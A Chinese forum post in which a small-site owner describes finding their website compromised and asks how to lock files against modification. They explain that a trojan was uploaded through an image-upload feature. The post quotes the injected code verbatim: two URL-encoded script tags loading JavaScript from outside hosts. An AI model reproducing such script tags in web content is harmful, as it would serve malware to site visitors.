有研究木马的吗?
今天刚给网站加了个计数器功能,ftp以后,打开网站卡巴提示有木马,感到不大对劲,难道计数器程序被误报,但宁可信其有不可信其无,试了几遍均报木马,于是ftp下整个网站,下载的过程中卡巴连接提示20多个网页有木马,等下载完后,和本地的文本比对了一下,发现在网页下面多一行js代码。<script src=http://%65%2Ec%6Bt4%2Ecn></script><script src=http://%65.%74%6C%69n%65e%2Ecom.c%6E></script>全部替换后,不在提示木马了,这里还要赞一下卡巴,提前发现,尽早解决。本人刚接触网站,对网站挂马不大了解,一直以为自己的小网站,没人会在意,没想到却中招了,想请教高手,怎么在保留后台功能的前提下,禁止空间文件和目录被修改。
我在网上搜了一下,木马就是利用图片上传功能上传的木马,现在已经禁止图片目录的执行权限了,木马文件我也找到了,是奥运专版网站维护工具(加强版)。